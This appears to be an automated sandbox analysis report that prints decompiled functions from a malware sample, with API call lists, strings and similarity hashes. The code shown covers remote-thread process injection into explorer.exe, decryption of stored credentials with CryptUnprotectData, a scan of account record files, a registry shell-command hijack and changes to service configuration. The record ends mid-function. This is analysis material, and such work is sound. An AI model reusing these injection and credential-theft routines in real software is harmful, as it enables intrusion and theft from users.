0x0040da66
0x0040da70
0x0040da73
0x0040da76
0x0040da79
0x0040da7c
0x0040da7f
0x0040da88
0x0040da8c
0x0040db3c
0x0040db3c
0x0040db40
0x0040db43
0x0040db4f
0x0040db4f
0x0040da95
0x0040da9c
0x0040da9f
0x0040da9f
0x0040daa9
0x0040dab9
0x0040dabf
0x0040dac4
0x0040dacb
0x0040dad5
0x0040dae2
0x0040daea
0x00000000
0x00000000
0x0040dafa
0x0040db00
0x0040db05
0x00000000
0x00000000
0x0040db07
0x0040db09
0x0040db13
0x0040db25
0x0040db50
0x0040db62
0x0040db6a
0x0040db6f
0x0040db79
0x0040db7d
0x0040db80
0x0040db85
0x0040db8d
0x0040dbd0
0x0040dbd3
0x0040dbd7
0x00000000
0x00000000
0x0040dbdd
0x0040dbec
0x0040dc29
0x0040dc29
0x0040dc2a
0x0040dc2f
0x00000000
0x00000000
0x00000000
0x0040dc31
0x0040dbf3
0x0040dc06
0x0040dc0d
0x0040dc15
0x0040dc15
0x0040dc1d
0x0040dc22
0x0040dc26
0x00000000
0x0040dc26
0x00000000
0x0040dbdd
0x0040db95
0x00000000
0x00000000
0x0040db9d
0x0040dba3
0x0040dba9
0x0040dbac
0x0040dbc1
0x0040dbc5
0x00000000
0x00000000
0x00000000
0x0040dbcb
0x0040db2a
0x0040db2f
0x0040db33
0x0040db36
0x0040db3a
0x00000000
0x00000000
0x00000000
0x0040db3a
0x00000000
0x0040db09
0x00000000

APIs

OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005), ref: 0040DA82
EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,00000000,?,?,?,00000000), ref: 0040DAB9

Part of subcall function 00405EFF: GetProcessHeap.KERNEL32(00000008,?,00402FA7,BZ@,?,?,004103FD,BZ@,00405D61,?,74B60770,00000000,?,00405A42,00000000), ref: 00405F02
Part of subcall function 00405EFF: RtlAllocateHeap.NTDLL(00000000,?,004103FD,BZ@,00405D61,?,74B60770,00000000,?,00405A42,00000000), ref: 00405F09

EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,?,?,?,?,00000000), ref: 0040DAE2
GetLastError.KERNEL32 ref: 0040DAEC
CloseServiceHandle.ADVAPI32(00000000), ref: 0040DAFA
OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005,00000000,00000000,?,00000000), ref: 0040DBBB
lstrcmpW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040DBFE

Strings

ServicesActive, xrefs: 0040DA6A, 0040DBB4

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: EnumHeapManagerOpenServicesStatus$AllocateCloseErrorHandleLastProcessServicelstrcmp
String ID: ServicesActive
API String ID: 899334174-3071072050
Opcode ID: 2076c571f37534c5517a533f3d0efceaced79cad2a21a4c5494dbfa7816e2df4
Instruction ID: e0d4839209ff9da016ff79895746b5e9208baf0a1d30bcf04ae5e2d65b817fac
Opcode Fuzzy Hash: 2076c571f37534c5517a533f3d0efceaced79cad2a21a4c5494dbfa7816e2df4
Instruction Fuzzy Hash: D1514B71D00219ABDB15EFE1C895BEFBBB8EF58305F11007AE501B62D1EB786A44CB58

Uniqueness

Uniqueness Score: -1.00%

Function 04698C40, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 105windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 04698C5E
GetVersionExW.KERNEL32(?), ref: 04698C82
FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 04698CB7
FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 04698CF1
_free.LIBCMT ref: 04698D22
LocalFree.KERNEL32(?), ref: 04698D31
_free.LIBCMT ref: 04698D71

Part of subcall function 04697680: AreFileApisANSI.KERNEL32 ref: 04697686
Part of subcall function 04697680: MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,00000000,00000000), ref: 0469769E
Part of subcall function 04697680: _malloc.LIBCMT ref: 046976AC

Strings

OsError 0x%x (%u), xrefs: 04698D4C

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: FormatMessage_free$ApisByteCharErrorFileFreeLastLocalMultiVersionWide_malloc
String ID: OsError 0x%x (%u)
API String ID: 2308407681-2664311388
Opcode ID: b9e99888e98dad14b730ef2fc3b86962d2edff3516153e4fa24b5216b859b6e9
Instruction ID: a3a29cb68a80901c3d13e320a4d5a4f0d7256d77f8ea963acf606b6bd5698a3a
Opcode Fuzzy Hash: b9e99888e98dad14b730ef2fc3b86962d2edff3516153e4fa24b5216b859b6e9
Instruction Fuzzy Hash: 2931C371901228EBDB24EF61DC44EDFBBF8EB09354F008499E50997200FA746E85CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 004079E8, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 97
injectionmemorythreadCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E004079E8(void* __ecx, long __edx, long _a4) {
				long _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				signed int _t17;
				void* _t19;
				void* _t22;
				long _t32;
				_Unknown_base(*)()* _t38;
				void* _t40;

				_t32 = __edx;
				_v24 = __ecx;
				if( *0x419694 == 0) {
					 *0x419694 = E00408617() != 0;
				}
				_t17 = OpenProcess(0x1fffff, 0, _a4);
				_t40 = _t17;
				if(_t40 != 0) {
					_t38 = VirtualAllocEx(_t40, 0, 0x100000, 0x3000, 0x40);
					if(_t38 == 0) {
						L12:
						_push(0xfffffffe);
						L13:
						_pop(_t19);
						L14:
						return _t19;
					}
					_v16 = _v16 & 0x00000000;
					VirtualProtectEx(_t40, _t38, 0x100000, 0x40,  &_v16);
					_t22 = VirtualAllocEx(_t40, 0x33370000, 0x100, 0x3000, 0x40);
					_v20 = _t22;
					if(_t22 == 0) {
						goto L12;
					}
					_v8 = _v8 & 0x00000000;
					if(WriteProcessMemory(_t40, _v20, "XXXXXX", E00401133("XXXXXX"),  &_v8) == 0 || _v8 != E00401133("XXXXXX")) {
						L11:
						_push(0xfffffffd);
						goto L13;
					} else {
						_v12 = _v12 & 0x00000000;
						if(WriteProcessMemory(_t40, _t38, _v24, _t32,  &_v12) == 0 || _v12 != _t32) {
							goto L11;
						} else {
							_t19 = CreateRemoteThread(_t40, 0, 0, _t38, 0, 0, 0);
							goto L14;
						}
					}
				} else {
					return _t17 | 0xffffffff;
				}
			}

0x004079f7
0x004079f9
0x004079fc
0x00407a05
0x00407a05
0x00407a16
0x00407a1c
0x00407a20
0x00407a40
0x00407a44
0x00407ae9
0x00407ae9
0x00407aeb
0x00407aeb
0x00407aec
0x00000000
0x00407aec
0x00407a4a
0x00407a5b
0x00407a73
0x00407a79
0x00407a7e
0x00000000
0x00000000
0x00407a80
0x00407aa5
0x00407ae5
0x00407ae5
0x00000000
0x00407ab7
0x00407ab7
0x00407acd
0x00000000
0x00407ad4
0x00407add
0x00000000
0x00407add
0x00407acd
0x00407a22
0x00000000
0x00407a22

APIs

OpenProcess.KERNEL32(001FFFFF,00000000,?,?,?,?,?), ref: 00407A16

Part of subcall function 00408617: GetCurrentProcess.KERNEL32(00419698,00407A03,?,?,?,?), ref: 0040861C
Part of subcall function 00408617: IsWow64Process.KERNEL32(00000000), ref: 00408623
Part of subcall function 00408617: GetProcessHeap.KERNEL32 ref: 00408629

VirtualAllocEx.KERNEL32(00000000,00000000,00100000,00003000,00000040,00000000), ref: 00407A3A
VirtualProtectEx.KERNEL32(00000000,00000000,00100000,00000040,00000000), ref: 00407A5B
VirtualAllocEx.KERNEL32(00000000,33370000,00000100,00003000,00000040), ref: 00407A73
WriteProcessMemory.KERNEL32(00000000,00000000,XXXXXX,00000000,00000000), ref: 00407A9D
WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 00407AC5
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00407ADD

Strings

XXXXXX, xrefs: 00407A88, 00407A94, 00407AA7

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Process$Virtual$AllocMemoryWrite$CreateCurrentHeapOpenProtectRemoteThreadWow64
String ID: XXXXXX
API String ID: 813767414-582547948
Opcode ID: f7980d72101ab79f02ff7da8c08f67de9c543138a2a8b102055740c08b7c63f5
Instruction ID: 09d1d6ce863853a094a956b362c231d8e2a32404ad851e20ffbd9e8c1043e28b
Opcode Fuzzy Hash: f7980d72101ab79f02ff7da8c08f67de9c543138a2a8b102055740c08b7c63f5
Instruction Fuzzy Hash: 88219175A05215BEEB2197A19C05FFF7A6C9B45714F20413AF610F01D0DBB8AA008A7E

Uniqueness

Uniqueness Score: -1.00%

Function 00409DF6, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 61
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409DF6(void* __ecx) {
				char _v272;
				struct _WIN32_FIND_DATAA _v592;
				char _v856;
				char _v1120;
				void* _t31;
				void* _t36;

				_t31 = __ecx;
				GetFullPathNameA(0x4196a8, 0x104,  &_v856, 0);
				PathCombineA( &_v1120,  &_v856, "*");
				_t36 = FindFirstFileA( &_v1120,  &_v592);
				if(_t36 != 0xffffffff) {
					do {
						if((_v592.dwFileAttributes | 0x00000010) == 0x10 && _v592.cFileName != 0x2e) {
							PathCombineA( &_v272, 0x4196a8,  &(_v592.cFileName));
							PathCombineA( &_v272,  &_v272, "Accounts\\Account.rec0");
							E00409ADF(_t31,  &_v272);
						}
					} while (FindNextFileA(_t36,  &_v592) != 0);
				}
				return 0;
			}

0x00409e15
0x00409e17
0x00409e36
0x00409e4c
0x00409e51
0x00409e53
0x00409e5f
0x00409e7d
0x00409e8c
0x00409e97
0x00409e97
0x00409eaa
0x00409e53
0x00409eb4

APIs

GetFullPathNameA.KERNEL32(004196A8,00000104,?,00000000,004196A8,?), ref: 00409E17
PathCombineA.SHLWAPI(?,?,00415F88), ref: 00409E36
FindFirstFileA.KERNEL32(?,?), ref: 00409E46
PathCombineA.SHLWAPI(?,004196A8,0000002E), ref: 00409E7D
PathCombineA.SHLWAPI(?,?,Accounts\Account.rec0), ref: 00409E8C

Part of subcall function 00409ADF: CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000,00000000,7673C620,?), ref: 00409AFC
Part of subcall function 00409ADF: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00409E9C,?), ref: 00409B09
Part of subcall function 00409ADF: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00409E9C,?), ref: 00409B10

FindNextFileA.KERNEL32(00000000,?), ref: 00409EA4

Strings

., xrefs: 00409E61
Accounts\Account.rec0, xrefs: 00409E7F

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Path$CombineFile$Find$CloseCreateErrorFirstFullHandleLastNameNext
String ID: .$Accounts\Account.rec0
API String ID: 3873318193-2526347284
Opcode ID: 496326a86480031c4c542591a56f492fdd8fb5a17ab89cc56a7fac79c6615577
Instruction ID: afeaf177b3496e173dad23fa2a566e02bf9300b9020c09ca96321908484f06e9
Opcode Fuzzy Hash: 496326a86480031c4c542591a56f492fdd8fb5a17ab89cc56a7fac79c6615577
Instruction Fuzzy Hash: 6F1133B2A0021C6BDB20D6A4DC89FEE776CDB45754F1045B7E609E31C1E6789E848FA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040D49C, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 52
serviceCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D49C(short** _a4, int _a8) {
				void* _t3;
				short* _t9;
				void* _t12;
				short* _t14;
				void* _t16;

				_t14 = 0;
				_t3 = OpenSCManagerW(0, L"ServicesActive", 1);
				_t16 = _t3;
				if(_t16 != 0) {
					_t12 = OpenServiceW(_t16,  *_a4, 2);
					if(_t12 != 0) {
						if(ChangeServiceConfigW(_t12, 0xffffffff, _a8, 0xffffffff, 0, 0, 0, 0, 0, 0, 0) != 0) {
							_t14 = 1;
						}
						CloseServiceHandle(_t16);
						CloseServiceHandle(_t12);
						_t9 = _t14;
					} else {
						CloseServiceHandle(_t16);
						_t9 = 0;
					}
					return _t9;
				}
				return _t3;
			}

0x0040d4a8
0x0040d4ab
0x0040d4b1
0x0040d4b5
0x0040d4c6
0x0040d4ca
0x0040d4ee
0x0040d4f2
0x0040d4f2
0x0040d4fa
0x0040d4fd
0x0040d4ff
0x0040d4cc
0x0040d4cd
0x0040d4d3
0x0040d4d3
0x00000000
0x0040d501
0x0040d505

APIs

OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 0040D4AB
OpenServiceW.ADVAPI32(00000000,?,00000002), ref: 0040D4C0
CloseServiceHandle.ADVAPI32(00000000), ref: 0040D4CD
ChangeServiceConfigW.ADVAPI32(00000000,000000FF,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040D4E6
CloseServiceHandle.ADVAPI32(00000000), ref: 0040D4FA
CloseServiceHandle.ADVAPI32(00000000), ref: 0040D4FD

Strings

ServicesActive, xrefs: 0040D4A3

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ChangeConfigManager
String ID: ServicesActive
API String ID: 493672254-3071072050
Opcode ID: b076dd4bb542dabec2ef23a6e3b6208dcc8746790eabf743052eb9ce82fcb500
Instruction ID: b4dfdcdb63f53d079e8cfef66dcecaee7ea17a8893e7e477399f0b4007c8b79a
Opcode Fuzzy Hash: b076dd4bb542dabec2ef23a6e3b6208dcc8746790eabf743052eb9ce82fcb500
Instruction Fuzzy Hash: C8F0963260422577D6211BA79C49E9B3E6DEBCA770B154232FB16E62D0CA74D80586A8

Uniqueness

Uniqueness Score: -1.00%

Function 004118BA, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004118BA() {
				void* _v8;
				int _v12;
				int _v16;
				struct _SECURITY_DESCRIPTOR* _v20;
				struct _SECURITY_ATTRIBUTES _v24;
				struct _SECURITY_DESCRIPTOR _v44;
				long _t20;

				if(InitializeSecurityDescriptor( &_v44, 1) == 0 || SetSecurityDescriptorDacl( &_v44, 1, 0, 0) == 0) {
					L5:
					return 0;
				} else {
					_v24 = 0xc;
					_v20 =  &_v44;
					_v16 = 0;
					_t20 = RegCreateKeyExA(0x80000001, "Software\\Classes\\Folder\\shell\\open\\command", 0, 0, 0, 0x20006,  &_v24,  &_v8,  &_v12);
					if(_t20 != 0) {
						SetLastError(_t20);
						goto L5;
					}
					RegCloseKey(_v8);
					return 1;
				}
			}

0x004118cf
0x00411931
0x00000000
0x004118e5
0x004118e8
0x004118ef
0x004118f9
0x00411913
0x0041191b
0x0041192b
0x00000000
0x0041192b
0x00411920
0x00000000
0x00411926

APIs

InitializeSecurityDescriptor.ADVAPI32(?,00000001,00000000,?,?,?,?,?,?,?,?,?,00411B06), ref: 004118C7
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000,?,?,?,?,?,?,?,?,?,00411B06), ref: 004118DB
RegCreateKeyExA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command,00000000,00000000,00000000,00020006,0000000C,00411B06,?), ref: 00411913
RegCloseKey.ADVAPI32(00411B06), ref: 00411920
SetLastError.KERNEL32(00000000), ref: 0041192B

Strings

Software\Classes\Folder\shell\open\command, xrefs: 00411909

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: DescriptorSecurity$CloseCreateDaclErrorInitializeLast
String ID: Software\Classes\Folder\shell\open\command
API String ID: 1473660444-2536721355
Opcode ID: aa370c4428ff2d7ca6942e7619f0a0c42fc3e650f29bba1da52834033b0b3064
Instruction ID: 1351c8bc264c3eb3db1e30f780c5af0957f61df009b839787c6251a863ec2e3f
Opcode Fuzzy Hash: aa370c4428ff2d7ca6942e7619f0a0c42fc3e650f29bba1da52834033b0b3064
Instruction Fuzzy Hash: 5B011AB1910218BADB209BA2DC49EDF7FBCEF49751F004162F605F2160E6748684CAA4

Uniqueness

Uniqueness Score: -1.00%

Function 004120B8, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004120B8(void* __ecx, void* __eflags) {
				char _v264;
				intOrPtr _v292;
				void* _v300;
				int _t11;
				void* _t22;

				_t22 = CreateToolhelp32Snapshot(2, 0);
				E00401052( &_v300, 0, 0x128);
				_v300 = 0x128;
				_t11 = Process32First(_t22,  &_v300);
				while(_t11 != 0) {
					if(E00401144( &_v264, "explorer.exe") == 0) {
						return _v292;
					}
					_t11 = Process32Next(_t22,  &_v300);
				}
				CloseHandle(_t22);
				return 0;
			}

0x004120d2
0x004120de
0x004120e6
0x004120f4
0x00412121
0x00412111
0x00000000
0x00412132
0x0041211b
0x0041211b
0x00412126
0x00000000

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004120C7
Process32First.KERNEL32(00000000,?), ref: 004120F4
Process32Next.KERNEL32 ref: 0041211B
CloseHandle.KERNEL32(00000000), ref: 00412126

Strings

explorer.exe, xrefs: 00412102

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID: explorer.exe
API String ID: 420147892-3187896405
Opcode ID: cca27d03e5fee3d13d730dbd736efbc05fad81dc8713c8ee7ea15d75a96c5f8e
Instruction ID: d4719916d67601202cd1e904b10d4c7f824d655a52d6a3ef4aa10d248f4bb20b
Opcode Fuzzy Hash: cca27d03e5fee3d13d730dbd736efbc05fad81dc8713c8ee7ea15d75a96c5f8e
Instruction Fuzzy Hash: 23018675501114BBD720A761AC09FDB77FCDB59710F1000B6FA45E2180EA78DAD18A5D

Uniqueness

Uniqueness Score: -1.00%

Function 046F5FCC, Relevance: 7.6, APIs: 5, Instructions: 58COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 046F6B3C
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 046F6B51
UnhandledExceptionFilter.KERNEL32(047001D0), ref: 046F6B5C
GetCurrentProcess.KERNEL32(C0000409), ref: 046F6B78
TerminateProcess.KERNEL32(00000000), ref: 046F6B7F

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 6ccdc9a6a7b325dcd7dce2761be81e21cc0767e22e3f60e16271d9b07f3dccb2
Instruction ID: 21aebb8302bd955b76f7fc74adfff5d4926d1de0e71111d5d533cc4f992adb7e
Opcode Fuzzy Hash: 6ccdc9a6a7b325dcd7dce2761be81e21cc0767e22e3f60e16271d9b07f3dccb2
Instruction Fuzzy Hash: 9221ACB481A344DFD731DFA4E4447D43BA4FB88328F10845AE90A96B40EBB86DC1CB09

Uniqueness

Uniqueness Score: -1.00%

Function 046A8720, Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 401COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 046A8856

Part of subcall function 046A2D40: _memset.LIBCMT ref: 046A2D6C

Strings

database corruption at line %d of [%.10s], xrefs: 046A88C8, 046A898A
ed759d5a9edb3bba5f48f243df47be29e3fe8cd7, xrefs: 046A88BE, 046A8980

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: _memset
String ID: database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
API String ID: 2102423945-1231421067
Opcode ID: 063cc149e77c945c71318de21d0002240320b6b5bf1fd0b30a2f78baacdbcc4f
Instruction ID: 909b41a5fa29782c6d7ef52800d80f9fd3bf350bf977ee4908af89d3fedae288
Opcode Fuzzy Hash: 063cc149e77c945c71318de21d0002240320b6b5bf1fd0b30a2f78baacdbcc4f
Instruction Fuzzy Hash: 69E1F471A047529FD714DF28C480A1ABBE1AF95304F0989ADE9988F342E771FC25CF92

Uniqueness

Uniqueness Score: -1.00%

Function 0041002B, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0041002B(char __ecx, void* __eflags) {
				void* _v8;
				char _v12;
				intOrPtr _v16;
				int _v20;
				WCHAR* _v24;
				intOrPtr _v28;
				signed int _v32;
				intOrPtr _v36;
				char _v40;
				WCHAR* _t33;
				intOrPtr _t34;
				int _t44;
				WCHAR* _t54;
				signed int _t72;
				char _t74;
				int _t75;
				long _t76;
				WCHAR* _t77;
				void* _t78;
				void* _t79;

				_t74 = __ecx;
				_v12 = __ecx;
				_t33 = E00405F53(0x208);
				_v32 = _v32 & 0x00000000;
				_t54 = _t33;
				_t34 = 5;
				_v28 = _t34;
				_v36 = _t34;
				E004019F6( &_v40, __eflags);
				_t76 = GetLogicalDriveStringsW(0x104, _t54);
				_t81 = _t76 - 0x104;
				if(_t76 > 0x104) {
					_t72 = 2;
					_t54 = E00405F53( ~(0 | _t81 > 0x00000000) | _t36 * _t72);
					GetLogicalDriveStringsW(_t76, _t54);
				}
				_t77 = 0;
				if( *_t54 != 0) {
					do {
						_v24 = _t77;
						E00403437( &_v24, E004035E5( &_v8, _t54));
						L00405EA5(_v8);
						_v8 = _t77;
						_t44 = GetDriveTypeW(_v24);
						_t79 = _t79 - 0xc;
						_t75 = _t44;
						_t78 = _t79;
						_v20 = _t75;
						E0040362D(_t78,  &_v24);
						 *(_t78 + 4) = _t75;
						 *((intOrPtr*)(_t78 + 8)) = _v16;
						E00401903( &_v40);
						_t54 =  &(( &(_t54[E00403261( &_v24)]))[1]);
						L00405EA5(_v24);
						_t77 = 0;
						_v24 = 0;
						_t84 =  *_t54;
					} while ( *_t54 != 0);
					_t30 =  &_v12; // 0x402c58
					_t74 =  *_t30;
				}
				E004013A8(_t74, _t84,  &_v40);
				_t60 = _v40;
				if(_v40 != 0) {
					E00401B00(_t60, _t60);
				}
				return _t74;
			}

0x00410034
0x0041003b
0x0041003e
0x00410043
0x0041004c
0x0041004e
0x0041004f
0x00410052
0x00410055
0x00410066
0x00410068
0x0041006e
0x00410074
0x00410083
0x00410087
0x00410087
0x0041008d
0x00410092
0x00410094
0x00410098
0x004100a4
0x004100ac
0x004100b4
0x004100b7
0x004100bd
0x004100c0
0x004100c2
0x004100c4
0x004100cd
0x004100d8
0x004100db
0x004100de
0x004100f1
0x004100f4
0x004100f9
0x004100fb
0x004100fe
0x004100fe
0x00410103
0x00410103
0x00410103
0x0041010c
0x00410111
0x00410116
0x00410119
0x00410119
0x00410124

APIs

Part of subcall function 00405F53: GetProcessHeap.KERNEL32(00000000,000000F4,00410477,?,74B60770,00000000,00405A34), ref: 00405F56
Part of subcall function 00405F53: RtlAllocateHeap.NTDLL(00000000), ref: 00405F5D

GetLogicalDriveStringsW.KERNEL32(00000104,00000000), ref: 00410060
GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 00410087
GetDriveTypeW.KERNEL32(?,00000000,00000000), ref: 004100B7

Strings

X,@, xrefs: 00410103

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Drive$HeapLogicalStrings$AllocateProcessType
String ID: X,@
API String ID: 387594888-3523447844
Opcode ID: c54c9a160ec837b444db30d521d3258fdaa2355358f57f3e1c8b7a31dbc9fc1f
Instruction ID: 9229edffabc910c33cb15af49934dc6947608b8cd10783d8f4c5320deadfe785
Opcode Fuzzy Hash: c54c9a160ec837b444db30d521d3258fdaa2355358f57f3e1c8b7a31dbc9fc1f
Instruction Fuzzy Hash: 22317071E002199BCB14EFA5C5859EFBBB8AF44345F10442FE501B7291EB785E40CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040A632, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
memoryencryptionstringCOMMON

Download Yara Rule

C-Code - Quality: 24%

			E0040A632(intOrPtr __ecx, WCHAR* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v8216;
				char* _t24;
				signed int _t27;
				WCHAR* _t29;
				intOrPtr _t30;
				signed int* _t31;
				intOrPtr _t32;
				void* _t34;
				intOrPtr _t35;
				intOrPtr _t36;
				void* _t38;
				void* _t39;

				_t30 = __ecx;
				E00401190(0x2014, __ecx);
				_t36 = _a4;
				_t29 = __edx;
				_v8 = _t30;
				_t3 = _t36 - 1; // -1
				_t34 = GlobalAlloc(0x40, _t3);
				_t38 = 1;
				if(_t36 > 1) {
					_t32 = _v8;
					do {
						 *((char*)(_t34 + _t38 - 1)) =  *((intOrPtr*)(_t38 + _t32));
						_t38 = _t38 + 1;
					} while (_t38 < _t36);
				}
				_t8 = _t36 - 1; // -1
				_v12 = _t34;
				_v16 = _t8;
				_t39 = 0;
				_t24 =  &_v16;
				__imp__CryptUnprotectData(_t24, 0, 0, 0, 0, 0,  &_v24);
				if(_t24 == 0) {
					_push(L"Could not decrypt");
				} else {
					if(_t36 > 0) {
						_t35 = _v20;
						_t31 =  &_v8216;
						do {
							_t27 =  *(_t35 + _t39) & 0x000000ff;
							_t39 = _t39 + 2;
							 *_t31 = _t27;
							_t31 =  &(_t31[0]);
						} while (_t39 < _t36);
					}
					_push( &_v8216);
				}
				return lstrcpyW(_t29, ??);
			}

0x0040a632
0x0040a63a
0x0040a642
0x0040a645
0x0040a647
0x0040a64a
0x0040a658
0x0040a65a
0x0040a65d
0x0040a65f
0x0040a662
0x0040a665
0x0040a669
0x0040a66a
0x0040a662
0x0040a66e
0x0040a671
0x0040a674
0x0040a677
0x0040a682
0x0040a686
0x0040a68e
0x0040a6b7
0x0040a690
0x0040a692
0x0040a694
0x0040a697
0x0040a69d
0x0040a69d
0x0040a6a1
0x0040a6a4
0x0040a6a7
0x0040a6aa
0x0040a69d
0x0040a6b4
0x0040a6b4
0x0040a6c7

APIs

GlobalAlloc.KERNEL32(00000040,-00000001,74B5E730,?,?,?,0040A5E6,00001000,?,00000000,00001000), ref: 0040A650
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040A5E6), ref: 0040A686
lstrcpyW.KERNEL32 ref: 0040A6BD

Strings

Could not decrypt, xrefs: 0040A6B7

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocCryptDataGlobalUnprotectlstrcpy
String ID: Could not decrypt
API String ID: 3112367126-1484008118
Opcode ID: f80272bcfd7b4012c06c6cd44eca8912b05befecd6a9058f8ec5d6f3f1efb93b
Instruction ID: 03c4e1aac85c020809a50852f1601ff2c06fb66bbebf65e7d6a161608b570130
Opcode Fuzzy Hash: f80272bcfd7b4012c06c6cd44eca8912b05befecd6a9058f8ec5d6f3f1efb93b
Instruction Fuzzy Hash: FC110A729003159BC711CBA9C8449DEF7BCEF88700B14447BE995F3251E6369E51CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 046997E0, Relevance: 6.1, APIs: 4, Instructions: 70timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 04699804
GetCurrentProcessId.KERNEL32 ref: 0469982F
GetTickCount.KERNEL32 ref: 04699844
QueryPerformanceCounter.KERNEL32(?), ref: 0469985B

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: CountCounterCurrentPerformanceProcessQuerySystemTickTime
String ID:
API String ID: 4122616988-0
Opcode ID: bc893236d4a423e78c449c206a7e5ba5312a15d28d6a3aff5afcd445090c82e6
Instruction ID: c9460c27c8959e04dcd574a0f7d3d180a51e22d89b50f463db09806bdcba71aa
Opcode Fuzzy Hash: bc893236d4a423e78c449c206a7e5ba5312a15d28d6a3aff5afcd445090c82e6
Instruction Fuzzy Hash: 65218EB5A0161AEBDB04CFA8D9849ADF7F5FB48324B50897DE90A93340DB35BD44CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0040F56D, Relevance: 6.1, APIs: 4, Instructions: 63
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040F56D(void* __ecx, void* __eflags) {
				void* _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				long _v20;
				long _v24;
				union _SID_NAME_USE _v28;
				short _v60;
				short _v580;
				void* _t37;

				_v20 = 0x10;
				_v8 = 0;
				_t37 = __ecx;
				_v16.Value = 0;
				_v12 = 0x500;
				E00401052( &_v580, 0, 0x208);
				_v24 = 0x104;
				if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v8) == 0 || LookupAccountSidW(0, _v8,  &_v580,  &_v24,  &_v60,  &_v20,  &_v28) == 0) {
					GetLastError();
				}
				if(_v8 != 0) {
					FreeSid(_v8);
				}
				E004035E5(_t37,  &_v580);
				return _t37;
			}

0x0040f57a
0x0040f58c
